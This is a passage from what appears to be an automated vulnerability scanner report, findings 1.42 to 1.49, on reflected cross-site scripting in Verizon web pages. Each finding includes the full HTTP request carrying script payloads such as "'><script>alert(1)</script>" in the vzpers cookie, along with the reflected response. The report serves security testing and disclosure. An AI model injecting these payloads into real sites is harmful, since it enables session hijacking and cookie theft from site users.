Expires: Mon, 13 Dec 2010 00:57:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:57:49 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:57:49 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Sun, 12-Dec-2010 00:57:49 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Sun, 12-Dec-2010 00:57:49 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Sun, 12-Dec-2010 00:57:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:49 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head">

<!--<link href="/content/commonfiles/includes/css/masterh
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXFD877<SCRIPT>ALERT(1)</SCRIPT>7B3F639E7B1 </DIV>
...[SNIP]...

1.42. http://www22.verizon.com/Residential/Bundles/Landing/fiosinternet_ultimate/fiosinternet_ultimate.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/Landing/fiosinternet_ultimate/fiosinternet_ultimate.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 85929<script>alert(1)</script>45c2f5b4f20 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/fiosinternet_ultimate/fiosinternet_ultimate.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX85929<script>alert(1)</script>45c2f5b4f20; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 60625
Expires: Mon, 13 Dec 2010 00:58:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:58:51 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:58:51 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Sun, 12-Dec-2010 00:58:51 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Sun, 12-Dec-2010 00:58:51 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Sun, 12-Dec-2010 00:58:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:58:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:58:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:58:51 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head">

<!--<link href="/content/commonfiles/includes/css/masterh
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX85929<SCRIPT>ALERT(1)</SCRIPT>45C2F5B4F20 </DIV>
...[SNIP]...

1.43. http://www22.verizon.com/Residential/Bundles/Landing/fiosinternet_ultimate/fiosinternet_ultimate.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/Landing/fiosinternet_ultimate/fiosinternet_ultimate.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c78a7'><script>alert(1)</script>8dad9703779 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/fiosinternet_ultimate/fiosinternet_ultimate.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXc78a7'><script>alert(1)</script>8dad9703779; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 60629
Expires: Mon, 13 Dec 2010 00:58:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:58:51 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:58:51 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Sun, 12-Dec-2010 00:58:51 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Sun, 12-Dec-2010 00:58:51 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Sun, 12-Dec-2010 00:58:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:58:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:58:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:58:51 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head">

<!--<link href="/content/commonfiles/includes/css/masterh
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC78A7'><SCRIPT>ALERT(1)</SCRIPT>8DAD9703779 ' />
...[SNIP]...

1.44. http://www22.verizon.com/Residential/Bundles/Landing/getredzone/getredzone [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/Landing/getredzone/getredzone

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload b917c<script>alert(1)</script>fa97df60a7d was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/getredzone/getredzone HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXb917c<script>alert(1)</script>fa97df60a7d; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 55746
Expires: Mon, 13 Dec 2010 00:57:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:57:56 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:57:56 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Sun, 12-Dec-2010 00:57:56 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Sun, 12-Dec-2010 00:57:56 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Sun, 12-Dec-2010 00:57:56 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:56 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:56 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:56 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head">

<!--<link href="/content/commonfiles/includes/css/masterh
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXB917C<SCRIPT>ALERT(1)</SCRIPT>FA97DF60A7D </DIV>
...[SNIP]...

1.45. http://www22.verizon.com/Residential/Bundles/Landing/getredzone/getredzone [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/Landing/getredzone/getredzone

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a8046'><script>alert(1)</script>f7d2e408c72 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/getredzone/getredzone HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXa8046'><script>alert(1)</script>f7d2e408c72; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 54208
Expires: Mon, 13 Dec 2010 00:57:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:57:55 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:57:55 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Sun, 12-Dec-2010 00:57:55 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Sun, 12-Dec-2010 00:57:55 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Sun, 12-Dec-2010 00:57:55 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:55 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:55 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:55 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head">

<!--<link href="/content/commonfiles/includes/css/masterh
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXA8046'><SCRIPT>ALERT(1)</SCRIPT>F7D2E408C72 ' />
...[SNIP]...

1.46. http://www22.verizon.com/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 86e1e<script>alert(1)</script>e652292994e was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX86e1e<script>alert(1)</script>e652292994e; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 62062
Expires: Mon, 13 Dec 2010 00:57:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:57:32 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:57:32 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Sun, 12-Dec-2010 00:57:32 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Sun, 12-Dec-2010 00:57:32 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Sun, 12-Dec-2010 00:57:32 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:32 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:32 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:32 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head">

<!--<link href="/content/commonfiles/includes/css/masterh
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX86E1E<SCRIPT>ALERT(1)</SCRIPT>E652292994E </DIV>
...[SNIP]...

1.47. http://www22.verizon.com/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 81d1d'><script>alert(1)</script>0ba91b1db69 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX81d1d'><script>alert(1)</script>0ba91b1db69; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 62066
Expires: Mon, 13 Dec 2010 00:57:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:57:31 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:57:31 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Sun, 12-Dec-2010 00:57:31 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Sun, 12-Dec-2010 00:57:31 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Sun, 12-Dec-2010 00:57:31 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:31 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:31 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:31 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head">

<!--<link href="/content/commonfiles/includes/css/masterh
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX81D1D'><SCRIPT>ALERT(1)</SCRIPT>0BA91B1DB69 ' />
...[SNIP]...

1.48. http://www22.verizon.com/Residential/Bundles/Landing/hsi_online_natoff/hsi_online_natoff.html [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/Landing/hsi_online_natoff/hsi_online_natoff.html

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 98eec'><script>alert(1)</script>ee170511886 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/hsi_online_natoff/hsi_online_natoff.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX98eec'><script>alert(1)</script>ee170511886; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68783
Expires: Mon, 13 Dec 2010 00:57:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:57:05 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:57:05 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Sun, 12-Dec-2010 00:57:05 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Sun, 12-Dec-2010 00:57:05 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Sun, 12-Dec-2010 00:57:05 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:05 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:05 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:05 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head">

<!--<link href="/content/commonfiles/includes/css/masterh
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX98EEC'><SCRIPT>ALERT(1)</SCRIPT>EE170511886 ' />
...[SNIP]...

1.49. http://www22.verizon.com/Residential/Bundles/Landing/hsi_online_natoff/hsi_online_natoff.html [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/Landing/hsi_online_natoff/hsi_online_natoff.html

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload cd2eb<script>alert(1)</script>65fe52be0f1 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/hsi_online_natoff/hsi_online_natoff.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXcd2eb<script>alert(1)</script>65fe52be0f1; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67237
Expires: Mon, 13 Dec 2010 00:57:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:57:06 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:57:06 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Sun, 12-Dec-2010 00:57:06 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Sun, 12-Dec-2010 00:57:06 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Sun, 12-Dec-2010 00:57:06 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
